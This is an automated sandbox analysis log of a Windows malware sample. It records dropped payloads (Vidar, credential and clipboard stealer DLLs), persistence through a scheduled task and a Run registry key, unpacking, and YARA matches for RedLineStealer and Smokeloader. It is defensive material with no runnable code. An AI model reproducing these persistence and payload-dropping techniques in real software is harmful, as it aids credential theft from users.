Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 736
Source: build.dll.28.dr Static PE information: No import functions for PE file found
Source: build[1].dll.28.dr Static PE information: No import functions for PE file found
Source: cred64[1].dll.28.dr Static PE information: No import functions for PE file found
Source: clip64[1].dll.28.dr Static PE information: No import functions for PE file found
Source: cred64.dll.28.dr Static PE information: No import functions for PE file found
Source: vidar.exe.28.dr Static PE information: No import functions for PE file found
Source: vidar[1].exe.28.dr Static PE information: No import functions for PE file found
Source: clip64.dll.28.dr Static PE information: No import functions for PE file found
Source: build.dll.28.dr Static PE information: Data appended to the last section found
Source: build[1].dll.28.dr Static PE information: Data appended to the last section found
Source: cred64[1].dll.28.dr Static PE information: Data appended to the last section found
Source: clip64[1].dll.28.dr Static PE information: Data appended to the last section found
Source: cred64.dll.28.dr Static PE information: Data appended to the last section found
Source: vidar.exe.28.dr Static PE information: Data appended to the last section found
Source: vidar[1].exe.28.dr Static PE information: Data appended to the last section found
Source: clip64.dll.28.dr Static PE information: Data appended to the last section found
Source: C4v61Eu50U.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0000001C.00000002.2929040316.0000000002F04000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1842923328.0000000002F13000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000002.1847927204.0000000002E42000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000002.1848088766.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001C.00000002.2929453849.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1843161831.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/81@2/1
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_02F13E6E CreateToolhelp32Snapshot,Module32First, 0_2_02F13E6E
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0040B375 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0040B375
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Roaming\810b84e2bfa3a9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Mutant created: \Sessions\1\BaseNamedObjects\810b84e2bfa3a9e2d0d81a3d2ea89e46
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6632
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6336
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File created: C:\Users\user\AppData\Local\Temp\154561dcbf
Source: C4v61Eu50U.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C4v61Eu50U.exe ReversingLabs: Detection: 31%
Source: C4v61Eu50U.exe Virustotal: Detection: 38%
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File read: C:\Users\user\Desktop\C4v61Eu50U.exe
Source: unknown Process created: C:\Users\user\Desktop\C4v61Eu50U.exe "C:\Users\user\Desktop\C4v61Eu50U.exe"
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 736
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 780
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 848
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 856
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 848
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 848
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 996
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 1080
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 1116
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe "C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe"
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 472
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 540
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 548
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 540
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 712
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 816
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 824
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6632 -s 848
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File opened: C:\Windows\SysWOW64\msvcr100.dll

Data Obfuscation

Source: C:\Users\user\Desktop\C4v61Eu50U.exe Unpacked PE file: 0.2.C4v61Eu50U.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 20.2.Dctooux.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 28.2.Dctooux.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Unpacked PE file: 0.2.C4v61Eu50U.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 20.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Unpacked PE file: 28.2.Dctooux.exe.400000.0.unpack
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0042F299 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042F299
Source: build.dll.28.dr Static PE information: real checksum: 0x4a045 should be: 0x1ef82
Source: build[1].dll.28.dr Static PE information: real checksum: 0x4a045 should be: 0x1ef82
Source: cred64[1].dll.28.dr Static PE information: real checksum: 0x0 should be: 0xa151
Source: clip64[1].dll.28.dr Static PE information: real checksum: 0x0 should be: 0x26385
Source: cred64.dll.28.dr Static PE information: real checksum: 0x0 should be: 0xa151
Source: vidar.exe.28.dr Static PE information: real checksum: 0x4fa67 should be: 0x9bba
Source: vidar[1].exe.28.dr Static PE information: real checksum: 0x4fa67 should be: 0x29853
Source: clip64.dll.28.dr Static PE information: real checksum: 0x0 should be: 0x26385
Source: cred64[1].dll.28.dr Static PE information: section name: _RDATA
Source: cred64.dll.28.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_004212D6 push ecx; ret 0_2_004212E9
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_00420C2C push ecx; ret 0_2_00420C3F
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_02F17053 push ebp; ret 0_2_02F1712B
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_02F181B0 pushad ; iretd 0_2_02F181B1
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_048F4176 push ebp; retf 0000h 0_2_048F4177
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_04900E93 push ecx; ret 0_2_04900EA6
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00420C2C push ecx; ret 20_2_00420C3F
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_00413F0F push ebp; retf 0000h 20_2_00413F10
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_02E47A98 pushad ; iretd 20_2_02E47A99
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_02E4693B push ebp; ret 20_2_02E46A13
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04944176 push ebp; retf 0000h 20_2_04944177
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 20_2_04950E93 push ecx; ret 20_2_04950EA6
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_00420C2C push ecx; ret 28_2_00420C3F
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_0044116B push ss; iretd 28_2_0044116C
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_004212D6 push ecx; ret 28_2_004212E9
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_02F08FB0 pushad ; iretd 28_2_02F08FB1
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_02F07E53 push ebp; ret 28_2_02F07F2B
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03114176 push ebp; retf 0000h 28_2_03114177
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Code function: 28_2_03120E93 push ecx; ret 28_2_03120EA6
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Temp\1000101001\vidar.exe
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar[1].exe
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File created: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Temp\1000102011\build.dll
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\build[1].dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe File created: C:\Windows\Tasks\Dctooux.job
Source: C:\Users\user\AppData\Local\Temp\154561dcbf\Dctooux.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run build.dll
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Code function: 0_2_0041FA68 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041FA68
Source: C:\Users\user\Desktop\C4v61Eu50U.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
